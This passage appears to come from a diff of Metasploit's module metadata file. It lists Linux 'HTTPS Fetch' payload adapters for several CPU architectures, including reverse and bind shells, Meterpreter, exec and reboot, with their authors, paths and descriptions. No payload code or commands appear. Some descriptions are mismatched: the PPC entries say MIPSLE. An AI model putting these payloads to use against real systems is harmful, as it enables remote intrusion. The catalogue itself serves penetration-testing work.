"author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an ARMLE payload from an HTTPS server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/armle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/armle/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/armle", + "adapted_refname": "linux/armle/meterpreter_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/https/armle/shell/bind_tcp": { + "name": "HTTPS Fetch, Linux dup2 Command Shell, Bind TCP Stager", + "fullname": "payload/cmd/linux/https/armle/shell/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "nemo " + ], + "description": "Fetch and execute an ARMLE payload from an HTTPS server.\ndup2 socket in r12, then execve.\n\nListen for a connection", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/armle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/armle/shell/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/armle", + "adapted_refname": "linux/armle/shell/bind_tcp", + "staged": true, + "stage_refname": "linux/armle/shell", + "stager_refname": "linux/armle/bind_tcp" + }, + "payload_cmd/linux/https/armle/shell/reverse_tcp": { + "name": "HTTPS Fetch, Linux dup2 Command Shell, Reverse TCP Stager", + "fullname": "payload/cmd/linux/https/armle/shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "nemo ", + "tkmru" + ], + "description": "Fetch and execute an ARMLE payload from an HTTPS server.\ndup2 socket in r12, then execve.\n\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/armle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/armle/shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/armle", + "adapted_refname": "linux/armle/shell/reverse_tcp", + "staged": true, + "stage_refname": "linux/armle/shell", + "stager_refname": "linux/armle/reverse_tcp" + }, + "payload_cmd/linux/https/armle/shell_bind_tcp": { + "name": "HTTPS Fetch, Linux Command Shell, Reverse TCP Inline", + "fullname": "payload/cmd/linux/https/armle/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "civ", + "hal" + ], + "description": "Fetch and execute an ARMLE payload from an HTTPS server.\nConnect to target and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/armle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/armle/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/armle", + "adapted_refname": "linux/armle/shell_bind_tcp", + "staged": false + }, + "payload_cmd/linux/https/armle/shell_reverse_tcp": { + "name": "HTTPS Fetch, Linux Command Shell, Reverse TCP Inline", + "fullname": "payload/cmd/linux/https/armle/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "civ" + ], + "description": "Fetch and execute an ARMLE payload from an HTTPS server.\nConnect back to attacker and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/armle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/armle/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/armle", + "adapted_refname": "linux/armle/shell_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/https/mips64/meterpreter_reverse_http": { + "name": "HTTPS Fetch", + "fullname": "payload/cmd/linux/https/mips64/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an MIPS64 payload from an HTTPS server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/mips64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/mips64/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/mips64", + "adapted_refname": "linux/mips64/meterpreter_reverse_http", + "staged": false + }, + "payload_cmd/linux/https/mips64/meterpreter_reverse_https": { + "name": "HTTPS Fetch", + "fullname": "payload/cmd/linux/https/mips64/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an MIPS64 payload from an HTTPS server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/mips64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/mips64/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/mips64", + "adapted_refname": "linux/mips64/meterpreter_reverse_https", + "staged": false + }, + "payload_cmd/linux/https/mips64/meterpreter_reverse_tcp": { + "name": "HTTPS Fetch", + "fullname": "payload/cmd/linux/https/mips64/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an MIPS64 payload from an HTTPS server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/mips64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/mips64/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/mips64", + "adapted_refname": "linux/mips64/meterpreter_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/https/mipsbe/exec": { + "name": "HTTPS Fetch, Linux Execute Command", + "fullname": "payload/cmd/linux/https/mipsbe/exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Michael Messner ", + "entropy " + ], + "description": "Fetch and execute an MIPSBE payload from an HTTPS server.\n\n A very small shellcode for executing commands.\n This module is sometimes helpful for testing purposes.", + "references": [ + "EDB-17940" + ], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/mipsbe.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/mipsbe/exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/mipsbe", + "adapted_refname": "linux/mipsbe/exec", + "staged": false + }, + "payload_cmd/linux/https/mipsbe/meterpreter/reverse_tcp": { + "name": "HTTPS Fetch, Reverse TCP Stager", + "fullname": "payload/cmd/linux/https/mipsbe/meterpreter/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "juan vazquez ", + "tkmru" + ], + "description": "Fetch and execute an MIPSBE payload from an HTTPS server.\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/mipsbe.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/mipsbe/meterpreter/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/mipsbe", + "adapted_refname": "linux/mipsbe/meterpreter/reverse_tcp", + "staged": true, + "stage_refname": "linux/mipsbe/meterpreter", + "stager_refname": "linux/mipsbe/reverse_tcp" + }, + "payload_cmd/linux/https/mipsbe/meterpreter_reverse_http": { + "name": "HTTPS Fetch", + "fullname": "payload/cmd/linux/https/mipsbe/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an MIPSBE payload from an HTTPS server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/mipsbe.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/mipsbe/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/mipsbe", + "adapted_refname": "linux/mipsbe/meterpreter_reverse_http", + "staged": false + }, + "payload_cmd/linux/https/mipsbe/meterpreter_reverse_https": { + "name": "HTTPS Fetch", + "fullname": "payload/cmd/linux/https/mipsbe/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an MIPSBE payload from an HTTPS server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/mipsbe.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/mipsbe/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/mipsbe", + "adapted_refname": "linux/mipsbe/meterpreter_reverse_https", + "staged": false + }, + "payload_cmd/linux/https/mipsbe/meterpreter_reverse_tcp": { + "name": "HTTPS Fetch", + "fullname": "payload/cmd/linux/https/mipsbe/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an MIPSBE payload from an HTTPS server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/mipsbe.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/mipsbe/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/mipsbe", + "adapted_refname": "linux/mipsbe/meterpreter_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/https/mipsbe/reboot": { + "name": "HTTPS Fetch, Linux Reboot", + "fullname": "payload/cmd/linux/https/mipsbe/reboot", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Michael Messner ", + "rigan - " + ], + "description": "Fetch and execute an MIPSBE payload from an HTTPS server.\n\n A very small shellcode for rebooting the system.\n This payload is sometimes helpful for testing purposes or executing\n other payloads that rely on initial startup procedures.", + "references": [ + "URL-http://www.shell-storm.org/shellcode/files/shellcode-795.php" + ], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/mipsbe.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/mipsbe/reboot", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/mipsbe", + "adapted_refname": "linux/mipsbe/reboot", + "staged": false + }, + "payload_cmd/linux/https/mipsbe/shell/reverse_tcp": { + "name": "HTTPS Fetch, Linux Command Shell, Reverse TCP Stager", + "fullname": "payload/cmd/linux/https/mipsbe/shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "juan vazquez ", + "tkmru" + ], + "description": "Fetch and execute an MIPSBE payload from an HTTPS server.\nSpawn a command shell (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/mipsbe.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/mipsbe/shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/mipsbe", + "adapted_refname": "linux/mipsbe/shell/reverse_tcp", + "staged": true, + "stage_refname": "linux/mipsbe/shell", + "stager_refname": "linux/mipsbe/reverse_tcp" + }, + "payload_cmd/linux/https/mipsbe/shell_bind_tcp": { + "name": "HTTPS Fetch, Linux Command Shell, Bind TCP Inline", + "fullname": "payload/cmd/linux/https/mipsbe/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "scut", + "vaicebine", + "Vlatko Kosturjak", + "juan vazquez " + ], + "description": "Fetch and execute an MIPSBE payload from an HTTPS server.\nListen for a connection and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/mipsbe.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/mipsbe/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/mipsbe", + "adapted_refname": "linux/mipsbe/shell_bind_tcp", + "staged": false + }, + "payload_cmd/linux/https/mipsbe/shell_reverse_tcp": { + "name": "HTTPS Fetch, Linux Command Shell, Reverse TCP Inline", + "fullname": "payload/cmd/linux/https/mipsbe/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "rigan ", + "juan vazquez " + ], + "description": "Fetch and execute an MIPSBE payload from an HTTPS server.\nConnect back to attacker and spawn a command shell", + "references": [ + "EDB-18226" + ], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/mipsbe.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/mipsbe/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/mipsbe", + "adapted_refname": "linux/mipsbe/shell_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/https/mipsle/exec": { + "name": "HTTPS Fetch, Linux Execute Command", + "fullname": "payload/cmd/linux/https/mipsle/exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Michael Messner ", + "entropy " + ], + "description": "Fetch and execute an MIPSLE payload from an HTTPS server.\n\n A very small shellcode for executing commands.\n This module is sometimes helpful for testing purposes as well as\n on targets with extremely limited buffer space.", + "references": [ + "EDB-17940" + ], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/mipsle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/mipsle/exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/mipsle", + "adapted_refname": "linux/mipsle/exec", + "staged": false + }, + "payload_cmd/linux/https/mipsle/meterpreter/reverse_tcp": { + "name": "HTTPS Fetch, Reverse TCP Stager", + "fullname": "payload/cmd/linux/https/mipsle/meterpreter/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "juan vazquez ", + "tkmru" + ], + "description": "Fetch and execute an MIPSLE payload from an HTTPS server.\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/mipsle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/mipsle/meterpreter/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/mipsle", + "adapted_refname": "linux/mipsle/meterpreter/reverse_tcp", + "staged": true, + "stage_refname": "linux/mipsle/meterpreter", + "stager_refname": "linux/mipsle/reverse_tcp" + }, + "payload_cmd/linux/https/mipsle/meterpreter_reverse_http": { + "name": "HTTPS Fetch", + "fullname": "payload/cmd/linux/https/mipsle/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an MIPSLE payload from an HTTPS server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/mipsle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/mipsle/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/mipsle", + "adapted_refname": "linux/mipsle/meterpreter_reverse_http", + "staged": false + }, + "payload_cmd/linux/https/mipsle/meterpreter_reverse_https": { + "name": "HTTPS Fetch", + "fullname": "payload/cmd/linux/https/mipsle/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an MIPSLE payload from an HTTPS server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/mipsle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/mipsle/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/mipsle", + "adapted_refname": "linux/mipsle/meterpreter_reverse_https", + "staged": false + }, + "payload_cmd/linux/https/mipsle/meterpreter_reverse_tcp": { + "name": "HTTPS Fetch", + "fullname": "payload/cmd/linux/https/mipsle/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an MIPSLE payload from an HTTPS server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/mipsle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/mipsle/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/mipsle", + "adapted_refname": "linux/mipsle/meterpreter_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/https/mipsle/reboot": { + "name": "HTTPS Fetch, Linux Reboot", + "fullname": "payload/cmd/linux/https/mipsle/reboot", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Michael Messner ", + "rigan - " + ], + "description": "Fetch and execute an MIPSLE payload from an HTTPS server.\n\n A very small shellcode for rebooting the system.\n This payload is sometimes helpful for testing purposes.", + "references": [ + "URL-http://www.shell-storm.org/shellcode/files/shellcode-795.php" + ], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/mipsle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/mipsle/reboot", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/mipsle", + "adapted_refname": "linux/mipsle/reboot", + "staged": false + }, + "payload_cmd/linux/https/mipsle/shell/reverse_tcp": { + "name": "HTTPS Fetch, Linux Command Shell, Reverse TCP Stager", + "fullname": "payload/cmd/linux/https/mipsle/shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "juan vazquez ", + "tkmru" + ], + "description": "Fetch and execute an MIPSLE payload from an HTTPS server.\nSpawn a command shell (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/mipsle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/mipsle/shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/mipsle", + "adapted_refname": "linux/mipsle/shell/reverse_tcp", + "staged": true, + "stage_refname": "linux/mipsle/shell", + "stager_refname": "linux/mipsle/reverse_tcp" + }, + "payload_cmd/linux/https/mipsle/shell_bind_tcp": { + "name": "HTTPS Fetch, Linux Command Shell, Bind TCP Inline", + "fullname": "payload/cmd/linux/https/mipsle/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "scut", + "vaicebine", + "Vlatko Kosturjak", + "juan vazquez " + ], + "description": "Fetch and execute an MIPSLE payload from an HTTPS server.\nListen for a connection and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/mipsle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/mipsle/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/mipsle", + "adapted_refname": "linux/mipsle/shell_bind_tcp", + "staged": false + }, + "payload_cmd/linux/https/mipsle/shell_reverse_tcp": { + "name": "HTTPS Fetch, Linux Command Shell, Reverse TCP Inline", + "fullname": "payload/cmd/linux/https/mipsle/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "rigan ", + "juan vazquez " + ], + "description": "Fetch and execute an MIPSLE payload from an HTTPS server.\nConnect back to attacker and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/mipsle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/mipsle/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/mipsle", + "adapted_refname": "linux/mipsle/shell_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/https/ppc/meterpreter_reverse_http": { + "name": "HTTPS Fetch", + "fullname": "payload/cmd/linux/https/ppc/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an MIPSLE payload from an HTTPS server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/ppc.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/ppc/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/ppc", + "adapted_refname": "linux/ppc/meterpreter_reverse_http", + "staged": false + }, + "payload_cmd/linux/https/ppc/meterpreter_reverse_https": { + "name": "HTTPS Fetch", + "fullname": "payload/cmd/linux/https/ppc/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an MIPSLE payload from an HTTPS server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/ppc.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/ppc/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/ppc", + "adapted_refname": "linux/ppc/meterpreter_reverse_https", + "staged": false + }, + "payload_cmd/linux/https/ppc/meterpreter_reverse_tcp": { + "name": "HTTPS Fetch", + "fullname": "payload/cmd/linux/https/ppc/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an MIPSLE payload from an HTTPS server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/ppc.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/ppc/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + 